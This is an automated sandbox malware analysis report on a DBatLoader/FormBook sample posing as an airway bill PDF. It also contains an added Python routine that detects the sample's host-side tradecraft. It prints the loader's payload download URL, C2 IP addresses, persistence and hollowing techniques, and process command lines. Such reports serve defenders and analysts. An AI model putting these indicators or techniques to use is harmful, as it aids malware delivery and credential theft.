Windows Analysis Report
Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe

Overview

General Information

Sample name: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
Analysis ID: 1582317
MD5: 09f4f91713bd6588465534822d5ad96c
SHA1: 3b6b69c8709aea821d60248294d52e3cfefecb23
SHA256: c8e0836b1e1ea4ee7486eb41994ae198cb5f60f460dc4cbefbbabc186329855f
Tags: exe, user-TeamDreier

Detection

Malware family: DBatLoader, FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe (PID: 5016 cmdline: "C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe" MD5: 09F4F91713BD6588465534822D5AD96C)
    • cmd.exe (PID: 6488 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hdcleziT.pif (PID: 6520 cmdline: C:\Users\Public\Libraries\hdcleziT.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • WQzLddwiZR.exe (PID: 5480 cmdline: "C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • proquota.exe (PID: 3560 cmdline: "C:\Windows\SysWOW64\proquota.exe" MD5: 224AA81092A51AE0080DEE1E454E11AD)
          • WQzLddwiZR.exe (PID: 4608 cmdline: "C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5668 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • Tizelcdh.PIF (PID: 2308 cmdline: "C:\Users\Public\Libraries\Tizelcdh.PIF" MD5: 09F4F91713BD6588465534822D5AD96C)
    • cmd.exe (PID: 7128 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hdcleziT.pif (PID: 4884 cmdline: C:\Users\Public\Libraries\hdcleziT.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
      • WQzLddwiZR.exe (PID: 6708 cmdline: "C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • proquota.exe (PID: 4256 cmdline: "C:\Windows\SysWOW64\proquota.exe" MD5: 224AA81092A51AE0080DEE1E454E11AD)
  • Tizelcdh.PIF (PID: 6788 cmdline: "C:\Users\Public\Libraries\Tizelcdh.PIF" MD5: 09F4F91713BD6588465534822D5AD96C)
    • cmd.exe (PID: 4776 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • hdcleziT.pif (PID: 5352 cmdline: C:\Users\Public\Libraries\hdcleziT.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)
  • cleanup
Malware Configuration

DBatLoader: {"Download Url": ["https://drive.google.com/uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1"]}
Yara Overview

Memory dumps (5 of 12 entries shown)
Source | Rule | Description | Author
00000000.00000002.2231702231.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
00000012.00000002.3370454633.0000000000AF0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000012.00000002.3370291190.0000000000AA0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000B.00000002.2806584419.000000001A250000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000000.00000002.2191756371.00000000022C6000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security

Unpacked PEs (5 of 6 entries shown)
Source | Rule | Description | Author
15.2.hdcleziT.pif.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
15.2.hdcleziT.pif.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0.2.Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe.22c67a8.0.raw.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
5.2.hdcleziT.pif.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
5.2.hdcleziT.pif.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                      System Summary

Source: File created; Author: frack113, Nasreddine Bencherchali; Data: EventID: 11, Image: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ProcessId: 5016, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\Users\Public\Libraries\hdcleziT.pif, CommandLine: C:\Users\Public\Libraries\hdcleziT.pif, Image: C:\Users\Public\Libraries\hdcleziT.pif, NewProcessName: C:\Users\Public\Libraries\hdcleziT.pif, OriginalFileName: C:\Users\Public\Libraries\hdcleziT.pif, ParentCommandLine: "C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe", ParentImage: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ParentProcessId: 5016, ParentProcessName: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ProcessCommandLine: C:\Users\Public\Libraries\hdcleziT.pif, ProcessId: 6520, ProcessName: hdcleziT.pif
Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ProcessId: 5016, TargetFilename: C:\Windows \SysWOW64\svchost.exe
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\Public\Tizelcdh.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ProcessId: 5016, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tizelcdh
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Libraries\Tizelcdh.PIF", ParentImage: C:\Users\Public\Libraries\Tizelcdh.PIF, ParentProcessId: 2308, ParentProcessName: Tizelcdh.PIF, ProcessCommandLine: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd, ProcessId: 7128, ProcessName: cmd.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\Public\Tizelcdh.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ProcessId: 5016, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tizelcdh
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: C:\Users\Public\Libraries\hdcleziT.pif, CommandLine: C:\Users\Public\Libraries\hdcleziT.pif, Image: C:\Users\Public\Libraries\hdcleziT.pif, NewProcessName: C:\Users\Public\Libraries\hdcleziT.pif, OriginalFileName: C:\Users\Public\Libraries\hdcleziT.pif, ParentCommandLine: "C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe", ParentImage: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ParentProcessId: 5016, ParentProcessName: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, ProcessCommandLine: C:\Users\Public\Libraries\hdcleziT.pif, ProcessId: 6520, ProcessName: hdcleziT.pif
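The Sigma matches above all key on a handful of host-side features: a directory component with a trailing space (C:\Windows \SysWOW64, a mock system directory), a system-process name such as svchost.exe written outside the real System32/SysWOW64, a Run value pointing at a .url in C:\Users\Public, and .pif/.cmd execution from C:\Users\Public\Libraries. The Python triage routine below is an added example and not part of the Joe Sandbox report; it applies those checks to Sysmon-style event dictionaries. The event records are constructed here to mirror the report's Sigma matches (two benign controls are included), and the tag names, the extension list and the system-process-name list are the example's own choices.

```python
"""Triage Sysmon-style events for the DBatLoader tradecraft in this report.

Added example, not part of the Joe Sandbox report. The events below are
constructed to mirror the report's Sigma matches; the tag names and the lists
of suspicious extensions and system process names are this example's own."""
import ntpath
import re

# A directory component ending in a space ("C:\Windows \SysWOW64") is a mock
# system directory: Win32 normally strips trailing spaces from path components,
# so such a directory only exists when created deliberately (e.g. via a \\?\
# path) to impersonate C:\Windows\System32 for DLL side-loading and
# auto-elevation abuse.
MOCK_DIR_RE = re.compile(r" \\")
PUBLIC_PREFIX = "c:\\users\\public\\"
LEGIT_SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
SYSTEM_PROCESS_NAMES = {"svchost.exe", "conhost.exe", "cmd.exe", "explorer.exe", "lsass.exe"}
SUSPICIOUS_EXTENSIONS = {".pif", ".scr", ".cmd", ".bat"}
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\\", re.IGNORECASE)


def is_mock_system_dir(path: str) -> bool:
    """True if any directory component of the path ends with a space."""
    return bool(MOCK_DIR_RE.search(path))


def in_public_folder(path: str) -> bool:
    return path.lower().startswith(PUBLIC_PREFIX)


def triage_event(ev: dict) -> list:
    """Return the finding tags for one Sysmon-style event dict."""
    findings = []
    eid = ev.get("EventID")
    if eid == 11:  # FileCreate
        target = ev.get("TargetFilename", "")
        if is_mock_system_dir(target):
            findings.append("mock_system_dir_write")
        if (ntpath.basename(target).lower() in SYSTEM_PROCESS_NAMES
                and ntpath.dirname(target).lower() not in LEGIT_SYSTEM_DIRS):
            findings.append("system_name_outside_system_dir")
    elif eid == 13:  # RegistryEvent (value set)
        details = ev.get("Details", "")
        if RUN_KEY_RE.search(ev.get("TargetObject", "")) and (
                in_public_folder(details) or details.lower().endswith(".url")):
            findings.append("run_key_to_suspicious_target")
    elif eid == 1:  # ProcessCreate
        image = ev.get("Image", "")
        cmdline = ev.get("CommandLine", "").lower()
        if in_public_folder(image):
            findings.append("exec_from_public")
        if is_mock_system_dir(image):
            findings.append("exec_from_mock_system_dir")
        if ntpath.splitext(image)[1].lower() in SUSPICIOUS_EXTENSIONS:
            findings.append("suspicious_extension")
        if in_public_folder(ev.get("ParentImage", "")):
            findings.append("parent_in_public")
        if PUBLIC_PREFIX in cmdline and cmdline.rstrip().endswith(tuple(SUSPICIOUS_EXTENSIONS)):
            findings.append("script_from_public")
    return findings


def triage(events) -> list:
    """(event index, tag) pairs for every finding across a list of events."""
    return [(i, tag) for i, ev in enumerate(events) for tag in triage_event(ev)]


DROPPER = r"C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe"
# Constructed events mirroring the report's Sigma matches; the last two are benign controls.
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": DROPPER, "TargetFilename": r"C:\Windows \SysWOW64\NETUTILS.dll"},
    {"EventID": 11, "Image": DROPPER, "TargetFilename": r"C:\Windows \SysWOW64\svchost.exe"},
    {"EventID": 13, "Image": DROPPER, "Details": r"C:\Users\Public\Tizelcdh.url",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tizelcdh"},
    {"EventID": 1, "Image": r"C:\Users\Public\Libraries\hdcleziT.pif", "ParentImage": DROPPER},
    {"EventID": 1, "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r"C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd",
     "ParentImage": r"C:\Users\Public\Libraries\Tizelcdh.PIF"},
    {"EventID": 11, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetFilename": r"C:\Windows\SysWOW64\config\update.dat"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for index, tag in triage(SAMPLE_EVENTS):
        print(f"event {index}: {tag}")
```

The trailing-space check is deliberately narrow: it matches only a space immediately before a path separator, so ordinary paths such as C:\Program Files (x86)\ do not trigger it. The system-name check compares the full directory, not just the basename, which is what separates C:\Windows \SysWOW64\svchost.exe from the real binary.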
Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T10:57:03.587981+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49710 | 142.250.186.174 | 443 | TCP
2024-12-30T10:57:04.990462+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49711 | 172.217.16.193 | 443 | TCP
2024-12-30T10:58:27.534284+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49987 | 188.114.97.3 | 80 | TCP
2024-12-30T10:58:50.986008+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49991 | 52.223.13.41 | 80 | TCP
2024-12-30T10:59:04.630258+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49996 | 108.179.193.23 | 80 | TCP
2024-12-30T10:58:27.534284+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49987 | 188.114.97.3 | 80 | TCP
2024-12-30T10:58:50.986008+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49991 | 52.223.13.41 | 80 | TCP
2024-12-30T10:59:04.630258+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49996 | 108.179.193.23 | 80 | TCP
2024-12-30T10:58:43.355868+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49988 | 52.223.13.41 | 80 | TCP
2024-12-30T10:58:45.893956+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49989 | 52.223.13.41 | 80 | TCP
2024-12-30T10:58:48.451399+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49990 | 52.223.13.41 | 80 | TCP
2024-12-30T10:58:57.038535+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49993 | 108.179.193.23 | 80 | TCP
2024-12-30T10:58:59.564543+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49994 | 108.179.193.23 | 80 | TCP
2024-12-30T10:59:02.166341+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49995 | 108.179.193.23 | 80 | TCP


                      AV Detection

Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe; Malware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.google.com/uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1"]}
Source: C:\Users\Public\Libraries\Tizelcdh.PIF; ReversingLabs: Detection: 26%
Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe; ReversingLabs: Detection: 26%
Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe; Virustotal: Detection: 33%
Source: Yara match; File source: 15.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 15.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.hdcleziT.pif.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.hdcleziT.pif.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000012.00000002.3370454633.0000000000AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.3370291190.0000000000AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.2806584419.000000001A250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2639223190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000F.00000002.2725067092.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.2805235368.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000012.00000002.3368003513.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.2788912013.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.2807095527.000000001D920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.3370452478.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2699018066.0000000024B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000013.00000002.3371188324.0000000005980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.2702788304.0000000024FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown; HTTPS traffic detected: 142.250.186.174:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.6:49711 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WQzLddwiZR.exe, 00000011.00000000.2545685733.000000000081E000.00000002.00000001.01000000.00000008.sdmp, WQzLddwiZR.exe, 00000013.00000002.3368381118.000000000081E000.00000002.00000001.01000000.00000008.sdmp, WQzLddwiZR.exe, 00000015.00000000.2752944866.000000000081E000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: easinvoker.pdb source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.0000000020800000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007ED90000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: hdcleziT.pif, 00000005.00000003.2447031738.0000000024928000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 00000005.00000003.2481886824.0000000024AD8000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 00000005.00000002.2700732408.0000000024C80000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 00000005.00000002.2700732408.0000000024E1E000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000003.2639139666.0000000019F7A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000003.2644190157.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A46E000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.0000000030680000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2716304869.000000003032B000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2718335286.00000000304D9000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.000000003081E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2654345746.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2631939876.0000000004216000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.0000000004570000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.000000000470E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.000000000498E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2791416018.000000000463E000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2789081856.0000000004487000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdbGCTL source: hdcleziT.pif, 00000005.00000003.2633995810.000000002483C000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806361491.0000000019D97000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369403397.0000000001148000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000002.3369597830.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: hdcleziT.pif, hdcleziT.pif, 0000000B.00000003.2639139666.0000000019F7A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000003.2644190157.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A46E000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806628363.000000001A2D0000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.0000000030680000.00000040.00001000.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2716304869.000000003032B000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000003.2718335286.00000000304D9000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000F.00000002.2752209282.000000003081E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2654345746.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000003.2631939876.0000000004216000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.0000000004570000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3371310790.000000000470E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.000000000498E000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2791416018.000000000463E000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000014.00000002.2805524541.00000000047F0000.00000040.00001000.00020000.00000000.sdmp, proquota.exe, 00000014.00000003.2789081856.0000000004487000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: proquota.pdb source: hdcleziT.pif, 00000005.00000003.2633995810.000000002483C000.00000004.00000020.00020000.00000000.sdmp, hdcleziT.pif, 0000000B.00000002.2806361491.0000000019D97000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000011.00000002.3369403397.0000000001148000.00000004.00000020.00020000.00000000.sdmp, WQzLddwiZR.exe, 00000013.00000002.3369597830.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp
